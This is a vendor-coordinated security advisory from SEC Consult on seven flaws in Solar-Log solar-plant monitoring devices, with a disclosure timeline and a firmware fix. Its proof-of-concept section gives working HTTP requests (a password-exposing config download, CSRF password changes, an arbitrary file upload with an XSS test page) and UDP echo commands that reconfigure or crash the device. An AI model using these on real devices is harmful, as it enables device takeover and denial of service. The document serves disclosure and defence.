SEC Consult SA-20170322-0 :: Multiple vulnerabilities in Solare Datensysteme Solar-Log devices

--------------ms020108040509000707010104
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable

SEC Consult Vulnerability Lab Security Advisory < 20170322-0 >
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
              title: Multiple vulnerabilities
            product: Solare Datensysteme GmbH
                     Solar-Log 250/300/500/800e/1000/1000 PM+/1200/2000
 vulnerable version: Firmware 2.8.4-56 / 3.5.2-85
      fixed version: Firmware 3.5.3-86
         CVE number: -
             impact: Critical
           homepage: http://www.solar-log.com/de/home.html
              found: 2017-01-23
                 by: T. Weber (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Mo=
scow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Z=
urich

                     https://www.sec-consult.com
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

Vendor description:
-------------------
"Solare Datensysteme GmbH (SDS) is headquartered in the southern German c=
ity
of Binsdorf and specialises in the development and sale of monitoring sys=
tems
for photovoltaic plants. The company was founded in 2007 by Thomas Preuhs=
 and
J=C3=B6rg Karwath and was created from the company "TOP Solare Datensyste=
me". This
company had been developing and selling the "SolarLog=E2=84=A2" product r=
ange since
2005. Our core competence covers innovative products with short developme=
nt
cycles and an excellent cost/performance ratio. Our developments have the=

outstanding characteristics of high customer value, simple operation and
universal application without requiring time-consuming installation of
software."

Source: http://www.solar-log.uk/gb-en/unternehmen/ueber-uns.html


Business recommendation:
------------------------
SEC Consult recommends to immediately install the available firmware upda=
te
and restrict network access.

Furthermore, this device should not be used in production until a thoroug=
h
security review has been performed by security professionals and all
identified issues have been resolved.


Vulnerability overview/description:
-----------------------------------
1) Unauthenticated Download of Configuration including Device-Password
This vulnerability is present at least on firmware 2.8.4-56.

An attacker can download the configuration file without authentication an=
d
extract the password to login to Solar-Log. Therefore, an attacker can ga=
in
administrative access to such a device without prior authentication.


2) Cross-Site Request Forgery (CSRF)
This vulnerability is present at least on firmware 3.5.2-85.

A CSRF vulnerability enables an attacker to remove/modify a password of a=

device by luring an authenticated user to click on a crafted link. An att=
acker
is able to take over the device by exploiting this vulnerability.


3) Unauthenticated Arbitrary File Upload
This vulnerability is present at least on firmware 3.5.2-85.

Any files can be uploaded on the Solar-Log by using a crafted POST reques=
t. An
attacker can start a malicious website or use the Solar-Log as share to s=
tore
any (illegal) contents.


4) Information Disclosure (CVE-2001-1341)
All Solar-Log devices in the current firmware versions are prone to this
information disclosure vulnerability. (2.8.4-56 / 3.5.2-85)

The network configuration of the internal network including the gateway a=
nd
the MAC address of the device are leaked.

All details of the IPC@CHIP from Beck IPC (https://www.beck-ipc.com/) lik=
e RTOS
version and serial number are leaked as well.


5) Unauthenticated Change of Network-Configuration
All Solar-Log devices in the current firmware versions are prone to this
vulnerability. (2.8.4-56 / 3.5.2-85)

Since the Solar-Log is based on the chips of Beck IPC a UDP configuration=

server is enabled by default. This server allows to change the IP configu=
ration
over a specific UDP port. This functionality can be protected with a pass=
word,
but this is not set in the affected firmware versions.

The MAC address, which is leaked by 4), is needed to configure the device=
=2E
An attacker can reconfigure the device without any authentication.


6) Unauthenticated Denial of Service
All Solar-Log devices in the current firmware versions are prone to this
vulnerability. (2.8.4-56 / 3.5.2-85)

The Beck IPC UDP configuration server on Solar-Log device can be attacked=
 with
arbitrary UDP packets to permanently disable the Solar-Log until a manual=

reboot is triggered.


7) Potential Unauthenticated Reprogram of IPC@CHIP Flash Memory
Potentially available in all Solar-Log devices in the current firmware
versions. (2.8.4-56 / 3.5.2-85)

Since the "CHIPTOOL" from BECK IPC enables a developer to reprogram the c=
hip
over the network via UDP, a missing password can also enable an attacker =
to do
this on a Solar-Log device. This action can lead to a simple Denial of Se=
rvice
or a complex botnet of Solar-Log devices!


Proof of concept:
-----------------
1) Unauthenticated Download of Configuration including Device-Password
The full configuration is exposed by sending the following GET-request:
-------------------------------------------------------------------------=
------
GET /data/misc.dat HTTP/1.1
Host: <IP-Address>
[...]
-------------------------------------------------------------------------=
------
Since the response contains the password, an attacker can easily take
control over the device.


2) Cross-Site Request Forgery
By luring the user to issue the following request, the password is remove=
d:
-------------------------------------------------------------------------=
------
POST /setjp HTTP/1.1
Host: <IP-Address>

preval=3Dnone;postval=3D105;{"221":"0","223":"0","225":"1","287":"","288"=
:{"0":"0","1":"0"},"440":"0"}
-------------------------------------------------------------------------=
------

By luring the user to issue the following request, the password is modifi=
ed:
-------------------------------------------------------------------------=
------
POST /setjp HTTP/1.1
Host: <IP-Address>

preval=3Dnone;postval=3D105;{"221":"0","223":"1","224":"<New-Password>","=
225":"1","287":"","288":{"0":"0","1":"0"},"440":"0"}
-------------------------------------------------------------------------=
------


3) Unauthenticated Arbitrary File Upload
Any files can be uploaded by using the following POST-request:
-------------------------------------------------------------------------=
------
POST /menu/d_debug_db.html HTTP/1.1
Host: <IP-Address>
[...]
Referer: http://<IP-Address>/menu/d_debug_db.html
Content-Type: multipart/form-data; boundary=3D--------301473270
Content-Length: 341

----------301473270
Content-Disposition: form-data; name=3D"DESTINATION-PATH"

PoC.html
----------301473270
Content-Disposition: form-data; name=3D"FILE-CONTENT"; filename=3D"file.t=
xt"
Content-Type: text/plain

<html>
 <head>
 <title>SEC-Test</title>
 </head>
 <body>
 <script>alert("XSS-PoC");</script>
 </body>
</html>
----------301473270
Content-Disposition: form-data; name=3D"L_UPLOAD"

Hochladen
----------301473270--
-------------------------------------------------------------------------=
------

The uploaded content can be reached by this link:
http://<IP-Address>/PoC.html


4) Information Disclosure (CVE-2001-1341)
This vulnerability is a known issue to IPC@CHIP since 2001.
See: http://www.securityfocus.com/bid/2767/info

The following URL can be used to open the "ChipCfg" file on a Solar-Log d=
evice:
http://<IP-Address>/ChipCfg

If an attacker is in the same subnet, he can directly request this inform=
ation
from the device (the device responds to multicast) with the following com=
mand:
$ echo -n "0 1 A" >/dev/udp/<Target-IP>/8001


5) Unauthenticated Change of Network-Configuration
By using the following command a change of the network configuration can =
be
triggerd unauthenticated on UDP port 8001:
$ echo -n "<MAC> 4 2 0 <Desired-IP-Address> <Desired-Netmask> <Desired-Ga=
teway>"
>/dev/udp/<Target-IP>/8001

Example:
$ echo -n "001122334455 4 2 0 192.168.4.5 255.255.255.0 192.168.4.254"
>/dev/udp/192.168.4.9/8001


6) Unauthenticated Denial of Service
By using arbitrary null characters the IPC@CHIP can be pushed into an
undesired state:
$ echo -n "<MAC> 0 <IP-Address> <Netmask> <Gateway> DDDD"
>/dev/udp/<Target-IP>/8001

Example:
$ echo -n "001122334455 0 192.168.4.5 255.255.255.0 192.168.4.254 DDDD=
0"
>/dev/udp/192.168.4.5/8001


7) Potential Unauthenticated Reprogram of IPC@CHIP Flash Memory
This action was not tested against the device. Such attack can brick the
Solar-Log. The worst case scenario would be a botnet exploiting this vuln=
erability.

A network-dump of the "CHIPTOOL" would be enough to reconstruct the requi=
red
UDP packets for the attack.


Vulnerable / tested versions:
-----------------------------
Solar-Log 1200 - 3.5.2-85
Solar-Log 800e - 2.8.4-56

Since the firmware for the other Solar-Log devices is exactly the same,
other devices with the same versions are also prone to the vulnerabilitie=
s!


Vendor contact timeline:
------------------------
2017-02-02: Contacting vendor via info@solar-log.com, support@solar-log.c=
om
            and berlin@solar-log.com.
2017-02-14: Vendor responds and requests the advisory unencrypted; Sent t=
he
            advisory unencrypted to the vendor.
2017-02-20: Asked for an update.
2017-02-21: Vendor states that the patch is in development. The update wi=
ll
            be published before 2017-03-24.
2017-03-14: Asked for a status update. Vendor states that the update will=

            be available on 2017-03-21.
2017-03-20: Vendor sends release notes. New firmware version is 3.5.3 bui=
ld
            86 for all affected Solar-Log devices.
            Informing the vendor that the release of the advisory is set =
to
            2017-03-22.
2017-03-22: Public advisory release.


Solution:
---------
Upgrade to firmware 3.5.3-86
http://www.solar-log.com/de/service-support/downloads/firmware.html


Workaround:
-----------
Restrict network access to the devices.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. I=
t
ensures the continued knowledge gain of SEC Consult in the field of netwo=
rk
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evalu=
ation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and v=
alid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consu=
lt?
Contact our local offices https://www.sec-consult.com/en/About/Contact.ht=
m
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF T. Weber / @2017


--------------ms020108040509000707010104
Content-Type: application/pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFADCABgkqhkiG9w0BBwEAAKCC
CxgwggSvMIIDl6ADAgECAhEA4CPLFRKDU4mtYW56VGdrITANBgkqhkiG9w0BAQsFADBvMQsw
CQYDVQQGEwJTRTEUMBIGA1UEChMLQWRkVHJ1c3QgQUIxJjAkBgNVBAsTHUFkZFRydXN0IEV4
dGVybmFsIFRUUCBOZXR3b3JrMSIwIAYDVQQDExlBZGRUcnVzdCBFeHRlcm5hbCBDQSBSb290
MB4XDTE0MTIyMjAwMDAwMFoXDTIwMDUzMDEwNDgzOFowgZsxCzAJBgNVBAYTAkdCMRswGQYD
VQQIExJHcmVhdGVyIE1hbmNoZXN0ZXIxEDAOBgNVBAcTB1NhbGZvcmQxGjAYBgNVBAoTEUNP
TU9ETyBDQSBMaW1pdGVkMUEwPwYDVQQDEzhDT01PRE8gU0hBLTI1NiBDbGllbnQgQXV0aGVu
dGljYXRpb24gYW5kIFNlY3VyZSBFbWFpbCBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC
AQoCggEBAImxDdp6UxlOcFIdvFamBia3uEngludRq/HwWhNJFaO0jBtgvHpRQqd5jKQi3xdh
TpHVdiMKFNNKAn+2HQmAbqUEPdm6uxb+oYepLkNSQxZ8rzJQyKZPWukI2M+TJZx7iOgwZOak
+FaA/SokFDMXmaxE5WmLo0YGS8Iz1OlAnwawsayTQLm1CJM6nCpToxDbPSBhPFUDjtlOdiUC
ISn6o3xxdk/u4V+B6ftUgNvDezVSt4TeIj0sMC0xf1m9UjewM2ktQ+v61qXxl3dnUYzZ7ifr
vKUHOHaMpKk4/9+M9QOsSb7K93OZOg8yq5yVOhM9DkY6V3RhUL7GQD/L5OKfoiECAwEAAaOC
ARcwggETMB8GA1UdIwQYMBaAFK29mHo0tCb3+sQmVO8DveAky1QaMB0GA1UdDgQWBBSSYWuC
4aKgqk/sZ/HCo/e0gADB7DAOBgNVHQ8BAf8EBAMCAYYwEgYDVR0TAQH/BAgwBgEB/wIBADAd
BgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwQwEQYDVR0gBAowCDAGBgRVHSAAMEQGA1Ud
HwQ9MDswOaA3oDWGM2h0dHA6Ly9jcmwudXNlcnRydXN0LmNvbS9BZGRUcnVzdEV4dGVybmFs
Q0FSb290LmNybDA1BggrBgEFBQcBAQQpMCcwJQYIKwYBBQUHMAGGGWh0dHA6Ly9vY3NwLnVz
ZXJ0cnVzdC5jb20wDQYJKoZIhvcNAQELBQADggEBABsqbqxVwTqriMXY7c1V86prYSvACRAj
mQ/FZmpvsfW0tXdeDwJhAN99Bf4Ss6SAgAD8+x1banICCkG8BbrBWNUmwurVTYT7/oKYz1gb
4yJjnFL4uwU2q31Ypd6rO2Pl2tVz7+zg+3vio//wQiOcyraNTT7kSxgDsqgt1Ni7QkuQaYUQ
26Y3NOh74AEQpZzKOsefT4g0bopl0BqKu6ncyso20fT8wmQpNa/WsadxEdIDQ7GPPprsnjJT
9HaSyoY0B7ksyuYcStiZDcGG4pCS+1pCaiMhEOllx/XVu37qjIUgAmLq0ToHLFnFmTPyOInl
tukWeh95FPZKEBom+nyK+5swggZhMIIFSaADAgECAhAriv4GJbNgG4KONRhUqx20MA0GCSqG
SIb3DQEBCwUAMIGbMQswCQYDVQQGEwJHQjEbMBkGA1UECBMSR3JlYXRlciBNYW5jaGVzdGVy
MRAwDgYDVQQHEwdTYWxmb3JkMRowGAYDVQQKExFDT01PRE8gQ0EgTGltaXRlZDFBMD8GA1UE
AxM4Q09NT0RPIFNIQS0yNTYgQ2xpZW50IEF1dGhlbnRpY2F0aW9uIGFuZCBTZWN1cmUgRW1h
aWwgQ0EwHhcNMTcwMzAxMDAwMDAwWhcNMjAwMjI5MjM1OTU5WjCCAVcxCzAJBgNVBAYTAkFU
MQ0wCwYDVQQREwQyNzAwMRowGAYDVQQIExFOaWVkZXJvZXN0ZXJyZWljaDEVMBMGA1UEBxMM
V3IuIE5ldXN0YWR0MRkwFwYDVQQJExBLb21hcmlnYXNzZSAxNC8xMS4wLAYDVQQKEyVTRUMg
Q29uc3VsdCBVbnRlcm5laG1lbnNiZXJhdHVuZyBHbWJIMUkwRwYDVQQLE0BJc3N1ZWQgdGhy
b3VnaCBTRUMgQ29uc3VsdCBVbnRlcm5laG1lbnNiZXJhdHVuZyBHbWJIIEUtUEtJIE1hbmFn
MR8wHQYDVQQLExZDb3Jwb3JhdGUgU2VjdXJlIEVtYWlsMSYwJAYDVQQDEx1TRUMgQ29uc3Vs
dCBWdWxuZXJhYmlsaXR5IExhYjEnMCUGCSqGSIb3DQEJARYYcmVzZWFyY2hAc2VjLWNvbnN1
bHQuY29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5+LisxDXcLwArMnTESPr
5G/6PY0xWAvPc81sZGgHbf4at31qtZn9eVMGAPx4nJShJVZsB3+0OavWSM1PvcsMgVp8ovIf
gnE05A/LZ4k38pMU+Zl0pcGx5TFQevKmCDwqV9JqLIoleIKHCeQVmZhGC7zccEYvKtvQqWsq
VJDFHPZisoIGl9YS048T8c9al1FQtIx3SDtxZhyigHI1t8kFAHloWGP8KCMIMX6g9FlTIlnQ
YFUAkQ/49KRyUDEHdRZey9hQLuvrgRKWZn1TxeTWW41IZKUQC6Lhb3LgrQzUQoR7dbdASh+3
sqiw1642dkyxChRoOptpoC1Wo5HLTELzYQIDAQABo4IB4DCCAdwwHwYDVR0jBBgwFoAUkmFr
guGioKpP7GfxwqP3tIAAwewwHQYDVR0OBBYEFBEBR5dneBkup36i0hf8pUVsEpMlMA4GA1Ud
DwEB/wQEAwIFoDAMBgNVHRMBAf8EAjAAMB0GA1UdJQQWMBQGCCsGAQUFBwMEBggrBgEFBQcD
AjBGBgNVHSAEPzA9MDsGDCsGAQQBsjEBAgEDBTArMCkGCCsGAQUFBwIBFh1odHRwczovL3Nl
Y3VyZS5jb21vZG8ubmV0L0NQUzBdBgNVHR8EVjBUMFKgUKBOhkxodHRwOi8vY3JsLmNvbW9k
b2NhLmNvbS9DT01PRE9TSEEyNTZDbGllbnRBdXRoZW50aWNhdGlvbmFuZFNlY3VyZUVtYWls
Q0EuY3JsMIGQBggrBgEFBQcBAQSBgzCBgDBYBggrBgEFBQcwAoZMaHR0cDovL2NydC5jb21v
ZG9jYS5jb20vQ09NT0RPU0hBMjU2Q2xpZW50QXV0aGVudGljYXRpb25hbmRTZWN1cmVFbWFp
bENBLmNydDAkBggrBgEFBQcwAYYYaHR0cDovL29jc3AuY29tb2RvY2EuY29tMCMGA1UdEQQc
MBqBGHJlc2VhcmNoQHNlYy1jb25zdWx0LmNvbTANBgkqhkiG9w0BAQsFAAOCAQEAQ9HL1/pw
/3RSCgHwSKfAejchG11KoLrm+7xdqBC1nVgJaQeX8smjraljd1PAL4KthtNP0Tr+DNr4d4hQ
WwHz/LnB0iap44v8LTaHTDUbWYD5NsOg8sD1JMQI8Jt6vC7Im+9O/rHxmvhL18hWoK4aIK/k
QG7eOfO5UmurKh7StuhE3t4KKEQnSTUCy+kNe8ut4KZdRs+o+mpSH09ecLo99Qs/FuaZMTgh
hZWkcSC1YT1jQDIF3lRDk+/+HbQ0h34tgPi/wJlI/7moci7B2AzYWFeHWcrGnuE6kZkRWtQV
F/u1NODSMp1DU3EzHLueYNufSYLWHh+yyzNnaoP5u7oLeDGCBEEwggQ9AgEBMIGwMIGbMQsw
CQYDVQQGEwJHQjEbMBkGA1UECBMSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdTYWxm
b3JkMRowGAYDVQQKExFDT01PRE8gQ0EgTGltaXRlZDFBMD8GA1UEAxM4Q09NT0RPIFNIQS0y
NTYgQ2xpZW50IEF1dGhlbnRpY2F0aW9uIGFuZCBTZWN1cmUgRW1haWwgQ0ECECuK/gYls2Ab
go41GFSrHbQwDQYJYIZIAWUDBAIBBQCgggJhMBgGCSqGSIb3DQEJAzELBgkqhkiG9w0BBwEw
HAYJKoZIhvcNAQkFMQ8XDTE3MDMyMjA5MjEyN1owLwYJKoZIhvcNAQkEMSIEIK0SIB+phoCg
GfNLm7/Gxx/dK745/ILSKl5ukICFCt9XMGwGCSqGSIb3DQEJDzFfMF0wCwYJYIZIAWUDBAEq
MAsGCWCGSAFlAwQBAjAKBggqhkiG9w0DBzAOBggqhkiG9w0DAgICAIAwDQYIKoZIhvcNAwIC
AUAwBwYFKw4DAgcwDQYIKoZIhvcNAwICASgwgcEGCSsGAQQBgjcQBDGBszCBsDCBmzELMAkG
A1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UEBxMHU2FsZm9y
ZDEaMBgGA1UEChMRQ09NT0RPIENBIExpbWl0ZWQxQTA/BgNVBAMTOENPTU9ETyBTSEEtMjU2
IENsaWVudCBBdXRoZW50aWNhdGlvbiBhbmQgU2VjdXJlIEVtYWlsIENBAhAriv4GJbNgG4KO
NRhUqx20MIHDBgsqhkiG9w0BCRACCzGBs6CBsDCBmzELMAkGA1UEBhMCR0IxGzAZBgNVBAgT
EkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UEBxMHU2FsZm9yZDEaMBgGA1UEChMRQ09NT0RP
IENBIExpbWl0ZWQxQTA/BgNVBAMTOENPTU9ETyBTSEEtMjU2IENsaWVudCBBdXRoZW50aWNh
dGlvbiBhbmQgU2VjdXJlIEVtYWlsIENBAhAriv4GJbNgG4KONRhUqx20MA0GCSqGSIb3DQEB
AQUABIIBAL/nZ9+1PyhosVXvJCh7A7k56aso1DfyAqiHMD6iHWBo2PDoc8+T72Jdf4lNLRK/
OrwMJhaPthg9bc+uFKPH6Q06++4EURpw7+rVTIDqL19KOJcpL/YNkYn8MMUqeNIeFsxH854p
99LUD2y2c4Zz6TJJeJIIydMnqD4m1N5WM/9coFhnOH0QHHOKAPbdX3HjRuDcTW6TY73PgZm4
BlvdvICgA+0hr9UmkyLogmHBJUPSEj/BptA0Zhha0PNhyEYhmh3PG5+0pDrZyhwmS+X0vkX5
QppxUAxmDuGrUapChpWRBFCLBkrawTNxqZo2uw5NgynKw5OKwf/YJbmIHonek6cAAAAAAAA=
--------------ms020108040509000707010104--